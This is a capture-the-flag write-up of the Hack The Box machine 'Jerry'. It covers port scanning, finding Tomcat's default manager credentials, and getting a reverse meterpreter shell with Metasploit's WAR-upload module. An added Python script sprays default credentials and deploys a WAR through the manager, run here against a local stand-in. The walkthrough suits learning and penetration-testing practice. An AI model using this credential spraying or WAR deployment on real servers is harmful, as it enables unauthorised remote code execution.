Jerry

2 March 2021

Starting information

  • Machine IP : 10.10.10.95
  • System : Windows

Network enumeration

I start by adding an entry to my /etc/hosts file so I do not have to type the IP every time:

/etc/hosts
10.10.10.95 jerry

Then I look for open ports with nmap and start an OpenVAS scan:

nmap -p- jerry -Pn
Not shown: 65534 filtered ports
PORT     STATE SERVICE
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 107.14 seconds

There is only one open port: 8080. Now I can run nmap's version detection and default scripts (-A) against that port to gather more information:

nmap -p8080 -A -Pn jerry

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Web page

Accessing http://10.10.10.95:8080 shows the default Apache Tomcat landing page. Three buttons are of interest:

  • Server Status
  • Manager App
  • Host Manager

Clicking any of these buttons triggers an HTTP Basic authentication prompt. If it fails, Tomcat's default 401 page is displayed, and it includes this example taken from the documentation:

For example, to add the admin-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.

Could the administrator have kept these example credentials when configuring the application? Yes: tomcat:s3cret is accepted.

Server status

The server status page gives us a bunch of information about the server:

Tomcat Version     Apache Tomcat/7.0.88
JVM Version        1.8.0_171-b11
JVM Vendor         Oracle Corporation
OS Name            Windows Server 2012 R2
OS Version         6.3
OS Architecture    amd64
Hostname           JERRY
IP Address         10.10.10.95

Web application manager

The application manager page lets us start, stop, reload and undeploy the deployed applications, and deploy a new one by uploading a WAR file.

Information gathered

After scanning the ports with nmap and OpenVAS and looking at the application, here is the information gathered.

Operating System

Windows Server 2012 R2 (6.3, amd64), as reported by the server status page

Open ports

Port        Service
8080/tcp    Apache Tomcat/7.0.88

Vulnerabilities

Here are the vulnerabilities found by OpenVAS:

Service    Description                                                       Severity
Apache     HTTP Brute Force Logins With Default Credentials Reporting        High
Apache     Apache Tomcat Manager Remote Unauthorized Access Vulnerability    High

These two findings report that the manager accepts the default credentials admin:admin and tomcat:s3cret; the second pair is the one already found from the 401 page.

Metasploit

The credentials found can be used with a Metasploit module that abuses the manager's deploy function to upload a WAR containing the payload. After searching for tomcat in Metasploit I selected the exploit multi/http/tomcat_mgr_upload and configured it with the following parameters:

Param           Value
RPORT           8080
RHOSTS          10.10.10.95
LHOST           my ip
LPORT           4444
HttpPassword    s3cret
HttpUsername    tomcat

In the Metasploit console, use <exploit_path> selects an exploit and set <option_name> <value> configures an option.

Once everything is set up, I run exploit and get a shell:

meterpreter > getuid
Server username: JERRY$

meterpreter > sysinfo
Computer    : JERRY
OS          : Windows Server 2012 R2 6.3 (amd64)
Meterpreter : java/windows

The service runs as the computer account JERRY$ (what Java reports as user.name when the process runs as a built-in service account), so no privilege escalation is needed and the flags are already readable:

cat ../Users/Administrator/Desktop/flags/2\ for\ the\ price\ of\ 1.txt
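The two steps used above, checking the manager for default credentials and then deploying a WAR through it, as an added example written for this page (it is neither code from the original post nor Metasploit's module). It runs offline against a constructed stand-in for the Tomcat manager that only accepts tomcat:s3cret; the credential list, the /probe context path and the benign JSP it deploys are assumptions of the example. Against the real target the base URL would be http://jerry:8080 and the deployed JSP would then be reachable at /probe/index.jsp.

```python
"""Added example: spray Tomcat manager default credentials, then deploy a WAR through
the manager text interface. Runs against a constructed local stand-in, not the HTB box."""
import base64, io, threading, urllib.error, urllib.request, zipfile
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

# Pairs to try: the two the page reports (admin:admin, tomcat:s3cret) plus two other
# common defaults. The list is an assumption of this example, not OpenVAS's wordlist.
DEFAULT_CREDS = [("tomcat", "tomcat"), ("admin", "admin"), ("tomcat", "s3cret"), ("admin", "")]

# Benign JSP proving execution inside the Tomcat JVM (the facts meterpreter's
# getuid/sysinfo showed). Hypothetical payload, not what tomcat_mgr_upload ships.
JSP_PROBE = """user=<%= System.getProperty("user.name") %>
os=<%= System.getProperty("os.name") %> <%= System.getProperty("os.version") %>
"""

def basic_auth(user, password):
    """Authorization header value for HTTP Basic auth."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()

def try_login(base_url, user, password, timeout=5):
    """True if /manager/html answers 200 for the pair; 401/403 (or any HTTP error) is False."""
    req = urllib.request.Request(base_url + "/manager/html",
                                 headers={"Authorization": basic_auth(user, password)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False

def spray_defaults(base_url, creds=DEFAULT_CREDS):
    """The default-credential check OpenVAS flagged: every pair the manager accepts."""
    return [(u, p) for u, p in creds if try_login(base_url, u, p)]

def build_war(jsp_source, jsp_name="index.jsp"):
    """A WAR is a zip; Tomcat 7 deploys one holding only a JSP, no WEB-INF/web.xml needed."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()

def deploy_war(base_url, user, password, context_path, war_bytes, timeout=10):
    """PUT the WAR to the manager text interface (requires the manager-script role);
    this is the same deploy endpoint tomcat_mgr_upload uses. Returns the manager's reply."""
    req = urllib.request.Request(f"{base_url}/manager/text/deploy?path={context_path}&update=true",
                                 data=war_bytes, method="PUT",
                                 headers={"Authorization": basic_auth(user, password),
                                          "Content-Type": "application/octet-stream"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()

class FakeManager(BaseHTTPRequestHandler):
    """Constructed stand-in for the Tomcat manager: Basic auth with tomcat:s3cret only,
    keeps whatever is PUT to /manager/text/deploy keyed by its context path."""
    deployed = {}

    def _authorized(self):
        return self.headers.get("Authorization") == basic_auth("tomcat", "s3cret")

    def _deny(self):
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="Tomcat Manager Application"')
        self.end_headers()

    def do_GET(self):
        if not self._authorized():
            return self._deny()
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"<html>Tomcat Web Application Manager</html>")

    def do_PUT(self):
        if not self._authorized():
            return self._deny()
        path = parse_qs(urlparse(self.path).query).get("path", ["/"])[0]
        FakeManager.deployed[path] = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        self.send_response(200)
        self.end_headers()
        self.wfile.write(f"OK - Deployed application at context path {path}\n".encode())

    def log_message(self, *args):  # keep the demo quiet
        pass

def run_demo():
    """Spray, deploy with the pair that worked, and report what each step produced."""
    srv = HTTPServer(("127.0.0.1", 0), FakeManager)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{srv.server_port}"
    try:
        found = spray_defaults(base)
        user, password = found[0]
        reply = deploy_war(base, user, password, "/probe", build_war(JSP_PROBE))
        with zipfile.ZipFile(io.BytesIO(FakeManager.deployed["/probe"])) as z:
            names = z.namelist()
        return {"creds": found, "reply": reply.strip(), "war_files": names}
    finally:
        srv.shutdown()
        srv.server_close()

if __name__ == "__main__":
    print(run_demo())
```

The text interface at /manager/text is the scriptable one and needs the manager-script role, while the page at /manager/html only needs manager-gui; if the account has manager-gui alone, the text deploy answers 403 and the same WAR has to be sent through the HTML manager's upload form instead, which is what the Metasploit module falls back to.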